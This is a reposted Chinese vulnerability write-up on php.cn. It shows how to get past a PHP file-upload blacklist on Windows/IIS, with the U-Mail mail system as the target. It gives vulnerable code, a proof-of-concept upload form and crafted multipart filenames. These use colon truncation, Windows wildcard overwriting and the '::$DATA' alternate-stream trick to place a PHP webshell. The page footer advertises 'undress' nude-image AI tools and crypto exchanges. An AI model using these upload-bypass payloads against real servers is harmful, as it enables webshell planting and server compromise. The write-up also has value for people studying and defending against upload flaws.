pkav之当php懈垢windows通用上传缺陷-php手册-php.cn

Table of Contents

详细说明：

漏洞证明：

Home

php教程

php手册

pkav之当php懈垢windows通用上传缺陷

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 06, 2016 pm 07:48 PM

php windows upload Universal

$pkav-publish{当php懈垢windows} 剑心@xsser抛弃了我，但我却不能抛弃乌云.. php懈垢windows，就像男人邂逅女人，早晚都会出问题的.. 感谢二哥@gainover Tips:本文讲述一种新型的文件上传方式(几个特性导致的漏洞)，并给出相应的实例.. 详细说明： #1 实例

$pkav->publish{当php懈垢windows}
剑心@xsser抛弃了我，但我却不能抛弃乌云..
php懈垢windows，就像男人邂逅女人，早晚都会出问题的..
感谢二哥@gainover
Tips:本文讲述一种新型的文件上传方式(几个特性导致的漏洞)，并给出相应的实例..

详细说明：

#1 实例介绍

本案例采用的实例是：U-Mail邮件系统。

U-Mail邮件系统文件上传的地方代码是这样的：

code 区域

<code><?php <br />
if(ACTION =="attach-upload"){<br>
	if($_FILES){<br>
		$file_name = $_FILES['Filedata']['name'];<br>
		$file_type = $_FILES['Filedata']['type'];<br>
        $file_size = $_FILES['Filedata']['size'];<br>
        $file_source = $_FILES['Filedata']['tmp_name'];<br>
        $file_suffix = getfilenamesuffix( $file_name );<br>
        $not_allow_ext = array( "php", "phps", "php3", "exe", "bat" );<br>
        if (in_array($file_suffix, $not_allow_ext )){<br>
            dump_json( array( "status" => 0, "message" => el( "不支持该扩展名文件上传", "" ) ) );<br>
        }<br>
        $path_target = getusercachepath( );<br>
        do{<br>
            $file_id = makerandomname( );<br>
            $file_target = $path_target.$file_id.".".$file_suffix;<br>
        } while ( file_exists( $file_target ) );<br>
        if ( move_uploaded_file( $file_source, $file_target )){<br>
            dump_json( array( "status" => 0, "message" => el( "写入文件出错，请与管理员联系！", "" ) ) );<br>
        }<br>
        $_SESSION[SESSION_ID]['attach_cache'][] = array( "id" => $file_id, "name" => $file_name, "type" => "1", "path" => $file_target, "size" => $file_size );<br>
        dump_json( array( "status" => "1", "filename" => $file_name, "filesize" => $file_size, "file_id" => $file_id ) );<br>
    }else{<br>
        dump_json( array( "status" => "0", "message" => el( "无法找到需要上传的文件！", "" ) ) );<br>
    }<br>
}</code>

Copy after login

我们注意到如下的代码

code 区域

<code>$not_allow_ext = array( "php", "phps", "php3", "exe", "bat" );<br>
if (in_array($file_suffix, $not_allow_ext )){<br>
	dump_json( array( "status" => 0, "message" => el( "不支持该扩展名文件上传", "" ) ) );<br>
}</code>

Copy after login

非常明显，采用的是黑名单验证，虽然我们可以采用类似这样的文件后缀绕过程序的检测，如：bypass.phpX(这里的X代表空格%20或其他特殊字符{%80-%99})，但这完全不是今天我想要讲的内容。

今天，通过这个实例给大家讲解一种新型的文件上传方式，且听我细细道来..

#2 代码poc实现

为了在本地测试方便，我们对上述代码进行简化，如下

code 区域

<code><?php <br />
//U-Mail demo ...<br>
if(isset($_POST['submit'])){<br>
	$filename = $_POST['filename'];<br>
	$filename = preg_replace("/[^\w]/i", "", $filename);<br>
	$upfile = $_FILES['file']['name'];<br>
        $upfile = str_replace(';',"",$upfile);<br>
	$upfile = preg_replace("/[^(\w|\:|\$|\.|\)]/i", "", $upfile);<br>
	$tempfile = $_FILES['file']['tmp_name'];<br>
<br>
	$ext = trim(get_extension($upfile)); // null<br>
<br>
	if(in_array($ext,array('php','php3','php5'))){<br>
		die('Warning ! File type error..');<br>
	}<br>
<br>
	if($ext == 'asp' or $ext == 'asa' or $ext == 'cer' or $ext == 'cdx' or $ext == 'aspx' or $ext == 'htaccess') $ext = 'file';<br>
<br>
        //$savefile = 'upload/'.$upfile;<br>
	$savefile = 'upload/'.$filename.".".$ext;<br>
<br>
	if(move_uploaded_file($tempfile,$savefile)){<br>
		die('Success upload..path :'.$savefile);<br>
	}else{<br>
		die('Upload failed..');<br>
	}<br>
}<br>
function get_extension($file){<br>
	return strtolower(substr($file, strrpos($file, '.')+1));<br>
}<br>
?><br>
<br>
 <br>
  <form method="post" action="upfile.php" enctype="multipart/form-data">
<br>
   <input type="file" name="file" value=""><br>
   <input type="hidden" name="filename" value="file"><br>
   <input type="submit" name="submit" value="upload"><br>
  </form>
<br>
 <br>
</code>

Copy after login

对于上述代码，虽然是通过黑名单进行文件名检测，但通过目前已知的上传方法，是没有办法成功上传php文件的（不考虑程序的Bug），因此可以说这段文件上传的代码是"安全"的，

可是，我蓦然回首，在那个灯火阑珊的地方，php邂逅了Windows，美丽的爱情故事便由此产生了..

#3 细说故事

某天，二哥在群里丢了一个url连接，我简单看了下，关于利用系统特性进行文件上传的，兴趣马上就来了，就细细研究了下，于是有了这篇文章..

pkav之当php懈垢windows通用上传缺陷

这几行英文的意思大致是,在php+window+iis环境下:

双引号(">") 点号(".")';

大于符号(">") 问号("?")';

小于符号(" 星号("*")';

有这么好玩的东西，那不就可以做太多的事了？但事实并不是这样，通过一系列的测试发现，该特性只能用于文件上传时覆盖已知的文件，于是这个特性便略显鸡肋..

原因有二：

1)上传文件的目录一般我们都不可控;

2)同时，一般文件上传的目录不可能存在我们想要的任何php文件，因此没办法覆盖;

后来，经过反反复复的思考，终于找到了可以完美利用的办法..

思路如下：

首先我们先利用特殊办法生成一个php文件，然后再利用这个特性将文件覆盖..

可问题又来了，怎样生成php文件呢?如果可以直接生成php文件的话，干嘛还要利用那什么特性?

别急，办法总是有的..

我们都知道在文件上传时，我们往往会考虑到文件名截断，如%00 等..

对！有的人可能还会用冒号(":")去截断，如：bypass.php:jpg

但是你知道吗?冒号截断产生的文件是空白的，里面并不会有任何的内容,呵呵说到这里明白了没有? 虽然生成的php文件里面没有内容，但是php文件总生成了吧，所以我们可以结合上面所说的特性完美成功利用..

#4 冒号+特性成功利用

按照#3提供的思路，实现..

本地测试地址：http://www.secmap.cn/upfile.php 环境：Windows+IIS7.5

1)首先利用冒号生成我们将要覆盖的php文件，这里为：bypass.php，如图

pkav之当php懈垢windows通用上传缺陷

点击forward后，可以看见成功生成空白的bypass.php文件

pkav之当php懈垢windows通用上传缺陷

2)利用上面的系统特性覆盖该文件

从上面已经知道"
我们可以这样修改上传的文件名，如下：

code 区域

<code>------WebKitFormBoundaryaaRARrn2LBvpvcwK<br>
Content-Disposition: form-data; name="file"; filename="bypass.
Content-Type: image/jpeg<br>
//注意！文件名为：bypass.</code>

Copy after login

点击go..,即可成功覆盖bypass.php文件，如图

pkav之当php懈垢windows通用上传缺陷

对比上面的两个图，bypass.php被我们成功的写入了内容..

pkav之当php懈垢windows通用上传缺陷

#5 特性二

首先来看看微软MSDN上面的一段话，如图

pkav之当php懈垢windows通用上传缺陷

注意红色圈起来的英文

code 区域

<code>The default data stream has no name. That is, the fully qualified name for the default stream for a file called "sample.txt" is "sample.txt::$DATA" since "sample.txt" is the name of the file and "$DATA" is the stream type.</code>

Copy after login

看不去不错哟，试试吧..

同样，我们可以这样修改上传的文件名，如下：

code 区域

<code>------WebKitFormBoundaryaaRARrn2LBvpvcwK<br>
Content-Disposition: form-data; name="file"; filename='DataStreamTest.php::$DATA'<br>
Content-Type: image/jpeg<br>
//注意！文件名为：DataStreamTest.php::$DATA</code>

Copy after login

点击GO,奇迹出现了..

pkav之当php懈垢windows通用上传缺陷

访问之...

pkav之当php懈垢windows通用上传缺陷

漏洞证明：

#6 漏洞证明

U-Mail，具体利用方法，同上述的方法一样，为了简单快捷的话，可直接抓包修改文件名为：

shell.php::$DATA 即可成功上传，这里不再演示，附shell

pkav之当php懈垢windows通用上传缺陷

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

Repo: How To Revive Teammates

1 months ago By 尊渡假赌尊渡假赌尊渡假赌

R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)

2 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

Hello Kitty Island Adventure: How To Get Giant Seeds

1 months ago By 尊渡假赌尊渡假赌尊渡假赌

How Long Does It Take To Beat Split Fiction?

4 weeks ago By DDD

R.E.P.O. Save File Location: Where Is It & How to Protect It?

4 weeks ago By DDD

Hot Tools

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Hot Topics

Where is the login entrance for gmail email?

7369

Java Tutorial

1628

CakePHP Tutorial

1354

Laravel Tutorial

1266

PHP Tutorial

1214

Related knowledge

How to update the latest version of Bybit Exchange? Will there be any impact if it is not updated? Feb 21, 2025 pm 10:54 PM

The way to update ByBit exchanges varies by platform and device: Mobile: Check for updates and install in the app store. Desktop Client: Check for updates in the Help menu and install automatically. Web page: You need to manually access the official website for updates. Failure to update the exchange can lead to security vulnerabilities, functional limitations, compatibility issues and reduced transaction execution efficiency.

deepseek web version entrance deepseek official website entrance Feb 19, 2025 pm 04:54 PM

DeepSeek is a powerful intelligent search and analysis tool that provides two access methods: web version and official website. The web version is convenient and efficient, and can be used without installation; the official website provides comprehensive product information, download resources and support services. Whether individuals or corporate users, they can easily obtain and analyze massive data through DeepSeek to improve work efficiency, assist decision-making and promote innovation.

Pi Node Teaching: What is a Pi Node? How to install and set up Pi Node? Mar 05, 2025 pm 05:57 PM

Detailed explanation and installation guide for PiNetwork nodes This article will introduce the PiNetwork ecosystem in detail - Pi nodes, a key role in the PiNetwork ecosystem, and provide complete steps for installation and configuration. After the launch of the PiNetwork blockchain test network, Pi nodes have become an important part of many pioneers actively participating in the testing, preparing for the upcoming main network release. If you don’t know PiNetwork yet, please refer to what is Picoin? What is the price for listing? Pi usage, mining and security analysis. What is PiNetwork? The PiNetwork project started in 2019 and owns its exclusive cryptocurrency Pi Coin. The project aims to create a one that everyone can participate

How to install deepseek Feb 19, 2025 pm 05:48 PM

There are many ways to install DeepSeek, including: compile from source (for experienced developers) using precompiled packages (for Windows users) using Docker containers (for most convenient, no need to worry about compatibility) No matter which method you choose, Please read the official documents carefully and prepare them fully to avoid unnecessary trouble.

How do you parse and process HTML/XML in PHP? Feb 07, 2025 am 11:57 AM

This tutorial demonstrates how to efficiently process XML documents using PHP. XML (eXtensible Markup Language) is a versatile text-based markup language designed for both human readability and machine parsing. It's commonly used for data storage an

PHP Program to Count Vowels in a String Feb 07, 2025 pm 12:12 PM

A string is a sequence of characters, including letters, numbers, and symbols. This tutorial will learn how to calculate the number of vowels in a given string in PHP using different methods. The vowels in English are a, e, i, o, u, and they can be uppercase or lowercase. What is a vowel? Vowels are alphabetic characters that represent a specific pronunciation. There are five vowels in English, including uppercase and lowercase: a, e, i, o, u Example 1 Input: String = "Tutorialspoint" Output: 6 explain The vowels in the string "Tutorialspoint" are u, o, i, a, o, i. There are 6 yuan in total

Coinsuper exchange software channel official website entrance Feb 21, 2025 pm 10:39 PM

The official website entrance of the Coinsuper Exchange: https://www.coinsuper.com. The client download channels are: Windows client, macOS client, and mobile (iOS/Android). Registration requires an email, mobile phone number and password, and you need to complete real-name authentication before you can trade. The platform provides a variety of digital asset transactions, including Bitcoin, Ethereum, etc., with the transaction fee rate of 0.1% for both orders and acceptors. Security safeguards include cold wallet storage, dual-factor verification, anti-money laundering and anti-terrorism financing measures, and with security public

Ouyi okx installation package is directly included Feb 21, 2025 pm 08:00 PM

Ouyi OKX, the world's leading digital asset exchange, has now launched an official installation package to provide a safe and convenient trading experience. The OKX installation package of Ouyi does not need to be accessed through a browser. It can directly install independent applications on the device, creating a stable and efficient trading platform for users. The installation process is simple and easy to understand. Users only need to download the latest version of the installation package and follow the prompts to complete the installation step by step.

See all articles